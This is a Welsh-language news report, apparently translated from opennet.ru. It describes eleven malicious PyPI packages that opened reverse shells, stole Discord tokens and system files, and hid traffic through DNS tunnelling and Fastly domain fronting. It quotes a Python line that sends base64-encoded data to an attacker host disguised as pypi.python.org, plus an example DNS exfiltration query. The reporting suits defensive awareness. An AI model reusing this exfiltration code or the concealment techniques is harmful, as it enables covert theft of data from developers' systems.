Yn y cyfeiriadur PyPI (Python Package Index), nodwyd 11 pecyn yn cynnwys cod maleisus. Cyn i broblemau gael eu nodi, roedd y pecynnau wedi'u llwytho i lawr tua 38 mil o weithiau i gyd. Mae'r pecynnau maleisus a ganfuwyd yn nodedig am eu defnydd o ddulliau soffistigedig i guddio sianeli cyfathrebu â gweinyddwyr yr ymosodwyr.
- importantpackage (6305 lawrlwythiadau), important-package (12897) - sefydlu cysylltiad â gweinydd allanol dan y gochl cysylltu â pypi.python.org i ddarparu mynediad cragen i'r system (cragen cefn) a defnyddio'r rhaglen trevorc2 i guddio'r sianel gyfathrebu.
- pptest (10001), ipboards (946) - defnyddio DNS fel sianel gyfathrebu i drosglwyddo gwybodaeth am y system (yn y pecyn cyntaf yr enw gwesteiwr, cyfeiriadur gweithio, IP mewnol ac allanol, yn yr ail - enw defnyddiwr ac enw gwesteiwr) .
- owlmoon (3285), DiscordSafety (557), yiffparty (1859) - nodi'r tocyn gwasanaeth Discord yn y system a'i anfon at westeiwr allanol.
- trrfab (287) - anfonwyd y dynodwr, enw gwesteiwr a chynnwys /etc/passwd, /etc/hosts, /home i'r gwesteiwr allanol.
- 10Cent10 (490) - sefydlu cysylltiad cragen wrthdro gyda gwesteiwr allanol.
- yandex-yt (4183) - wedi arddangos neges am y system yn cael ei pheryglu a'i hailgyfeirio i dudalen gyda gwybodaeth ychwanegol am gamau gweithredu pellach a gyhoeddwyd trwy nda.ya.ru (api.ya.cc).
O bwys arbennig yw'r dull o gyrchu gwesteiwyr allanol a ddefnyddir yn y pecyn pwysig a'r pecynnau pecyn pwysig, a ddefnyddiodd y rhwydwaith darparu cynnwys Fastly a ddefnyddir yn y cyfeiriadur PyPI i guddio eu gweithgaredd. Mewn gwirionedd, anfonwyd ceisiadau at y gweinydd pypi.python.org (gan gynnwys nodi'r enw python.org yn SNI y tu mewn i'r cais HTTPS), ond roedd pennawd HTTP “Host” yn cynnwys enw'r gweinydd a reolir gan yr ymosodwyr (sec. ymlaen.io. global.prod.fastly.net). Anfonodd y rhwydwaith darparu cynnwys gais tebyg at y gweinydd ymosod, gan ddefnyddio paramedrau'r cysylltiad TLS â pypi.python.org wrth drosglwyddo data.
Mae seilwaith PyPI yn cael ei bweru gan y rhwydwaith darparu cynnwys Fastly, sy'n defnyddio'r dirprwy tryloyw Varnish i storio ceisiadau nodweddiadol, ac mae hefyd yn defnyddio prosesu tystysgrif TLS ar lefel CDN, yn hytrach nag ar y gweinyddwyr terfynol, i anfon ceisiadau HTTPS ymlaen trwy ddirprwy. Waeth beth fo'r gwesteiwr targed, anfonir ceisiadau at y dirprwy, sy'n pennu'r gwesteiwr a ddymunir gan ddefnyddio'r pennawd “Host” HTTP, ac mae'r enwau parth gwesteiwr wedi'u cysylltu â chyfeiriadau IP cydbwysedd llwyth CDN sy'n nodweddiadol ar gyfer pob cleient Fastly.
Mae gweinydd yr ymosodwyr hefyd yn cofrestru gyda CDN Fastly, sy'n darparu cynlluniau am ddim i bawb a hyd yn oed yn caniatáu cofrestru dienw. Mae'n werth nodi, er mwyn anfon ceisiadau at y dioddefwr wrth greu “cragen wrthdroi”, bod cynllun hefyd yn cael ei ddefnyddio, ond yn cael ei gychwyn o ochr gwesteiwr yr ymosodwr. O'r tu allan, mae rhyngweithio â gweinydd yr ymosodwyr yn edrych fel sesiwn gyfreithlon gyda'r cyfeiriadur PyPI, wedi'i amgryptio gan ddefnyddio tystysgrif PyPI TLS. Defnyddiwyd techneg debyg, a elwir yn “flaen parth,” yn weithredol yn flaenorol i guddio enw’r gwesteiwr wrth osgoi blocio, gan ddefnyddio’r gallu a ddarperir mewn rhai rhwydweithiau CDN i gyrchu HTTPS trwy nodi gwesteiwr ffug yn yr SNI a throsglwyddo enw’r gwesteiwr y gofynnwyd amdano ym mhennyn HTTP Host y tu mewn i sesiwn TLS.
I guddio gweithgaredd maleisus, defnyddiwyd pecyn TrevorC2 hefyd i wneud rhyngweithio â'r gweinydd yn debyg i lywio gwe arferol, er enghraifft, anfonwyd ceisiadau maleisus dan y gochl o lawrlwytho'r ddelwedd “https://pypi.python.org/images/ guid =” gydag amgodio gwybodaeth ym mharamedr y canllaw. url = " https://pypi.python.org " + "/images" + "?" +"guid=" +b64_payload r = request.Request(url, headers = {'Host': "psec.forward.io.global.prod.fastly.net"})
Defnyddiodd y pecynnau pptest ac ipboards ddull gwahanol i guddio gweithgaredd rhwydwaith, yn seiliedig ar amgodio gwybodaeth ddefnyddiol mewn ymholiadau i'r gweinydd DNS. Mae'r malware yn trosglwyddo gwybodaeth trwy berfformio ceisiadau DNS fel “nu4timjagq4fimbuhe.example.com”, lle mae'r data a drosglwyddir i'r gweinydd rheoli yn cael ei amgodio gan ddefnyddio'r fformat base64 yn enw'r is-barth. Mae'r ymosodwr yn derbyn y negeseuon hyn trwy reoli'r gweinydd DNS ar gyfer y parth example.com.
Ffynhonnell: opennet.ru